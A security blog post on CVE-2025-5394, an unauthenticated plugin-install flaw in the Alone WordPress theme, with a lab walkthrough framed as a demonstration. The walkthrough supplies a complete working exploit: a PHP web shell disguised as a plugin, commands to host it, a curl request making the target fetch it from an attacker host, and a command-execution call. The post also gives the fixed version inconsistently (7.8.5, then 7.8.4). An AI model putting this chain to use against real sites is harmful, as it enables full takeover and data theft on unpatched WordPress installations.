Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install (CVE-2025-5394)

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites.
The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug.
According to Wordfence, the shortcoming relates to an arbitrary file upload affecting all versions of the plugin prior to and including 7.8.3. It has been addressed in version 7.8.5 released on June 16, 2025.
CVE-2025-5394 is rooted in a plugin installation function named "alone_import_pack_install_plugin()" and stems from a missing capability check, thereby allowing unauthenticated users to deploy arbitrary plugins from remote sources via AJAX and achieve code execution.
"This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover," Wordfence's István Márton said.
Evidence shows that CVE-2025-5394 began to be exploited starting July 12, two days before the vulnerability was publicly disclosed. This indicates that the threat actors behind the campaign may have been actively monitoring code changes for any newly addressed vulnerabilities.
Technical details
The vulnerability stems from a missing capability check in the aloneimportpackinstallplugin() function. This security oversight enables unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, indicating the highest severity level. The weakness has been classified as CWE-862 (Missing Authorization)
Practical Demonstration of CVE-2025-5394
1. Set Up a Vulnerable Lab Environment
Server: Use a local VM (e.g., Ubuntu 22.04 with LAMP stack) or Docker.
Install WordPress (version 6.x, default install is fine).
Download Alone Theme ≤ 7.8.3 (vulnerable version).
Install and activate the theme on your WordPress instance.
Disable firewalls/IDS in the lab so payloads aren’t blocked.
2. Identify the Vulnerable Function
The issue lies in the AJAX function:
php
CopyEdit
function alone_import_pack_install_plugin() {
// Missing capability check
// Accepts remote plugin package and installs it
}
Because it doesn’t check authentication (current_user_can()), anyone can call it.
3. Exploit Flow (High-Level)
Attacker crafts a malicious plugin ZIP containing a PHP web shell.
Sends an unauthenticated AJAX request to invoke
/wp-admin/admin-ajax.php?action=alone_import_pack_install_pluginWordPress installs the malicious plugin from the attacker’s remote server.
Attacker gains remote code execution by accessing the web shell.
4. Build a Malicious Plugin
Create a ZIP file called evil-plugin.zip:
evil-plugin.php
php
CopyEdit
<?php
/*
Plugin Name: Evil Plugin
*/
if(isset($_REQUEST['cmd'])){
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
Zip it:
bash
CopyEdit
zip evil-plugin.zip evil-plugin.php
Host it on a simple HTTP server:
bash
CopyEdit
python3 -m http.server 8000
5. Trigger the Exploit
Send the AJAX request (unauthenticated) to install your malicious plugin:
bash
CopyEdit
curl -X POST "http://targetsite.com/wp-admin/admin-ajax.php" \
-d "action=alone_import_pack_install_plugin" \
-d "plugin_url=http://attacker-ip:8000/evil-plugin.zip"
6. Gain Remote Code Execution
After success, access the plugin endpoint (adjust path as needed):
bash
CopyEdit
curl "http://targetsite.com/wp-content/plugins/evil-plugin/evil-plugin.php?cmd=whoami"
You should see the result of the command executed on the target server.
7. Cleanup
After testing, remove the malicious plugin:
Delete it from /wp-content/plugins/evil-plugin
Revert WordPress snapshot to pre-exploit state
Impact
The vulnerability allows attackers to achieve remote code execution on affected WordPress sites. This can lead to complete system compromise, as attackers can upload and execute malicious code through webshells disguised as legitimate plugins. The high severity rating indicates potential for significant damage to affected systems, including unauthorized access, data theft, and system manipulation
Mitigation and workarounds
Website administrators running the Alone theme should immediately update to version 7.8.4 or later which contains the security fix. The theme developers have addressed this vulnerability in their latest release available through ThemeForest
Subscribe to my newsletter
Read articles from sm_defencerabbit directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
